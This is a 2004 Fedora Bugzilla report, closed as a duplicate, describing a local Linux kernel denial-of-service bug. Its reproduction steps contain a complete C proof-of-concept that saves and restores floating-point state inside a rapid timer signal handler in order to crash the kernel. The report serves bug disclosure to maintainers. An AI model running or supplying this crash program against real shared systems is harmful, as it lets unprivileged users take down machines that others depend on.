Bug 125940

Summary: Local kernel denial of service exploit
Product: [Fedora] Fedora Reporter: Nils O. Selåsdal <nos>
Component: kernelAssignee: Arjan van de Ven <arjanv>
Status: CLOSED DUPLICATE QA Contact: Brian Brock <bbrock>
Severity: medium Docs Contact:
Priority: medium    
Version: 2Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2006-02-21 19:04:04 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Nils O. Selåsdal 2004-06-14 13:21:48 UTC 
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)
Gecko/20040608 Firefox/0.8

Description of problem:
Seems there is a local kernel denial of service exploit in just about
any kernel out there.
Info is at http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Fedora Core should be updated. RHEL should be investigated.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. compile and run:
#include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  
  static void Handler(int ignore)
  {
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
  
  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, Handler);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);
  
   return 0;
  }


Additional info:
Appears that the kernel doesn't handle floating point exeptions in
signal handlers.
Comment 1 Dave Jones 2004-06-14 16:12:55 UTC 

*** This bug has been marked as a duplicate of 125912 ***
Comment 2 Red Hat Bugzilla 2006-02-21 19:04:04 UTC 
Changed to 'CLOSED' state since 'RESOLVED' has been deprecated.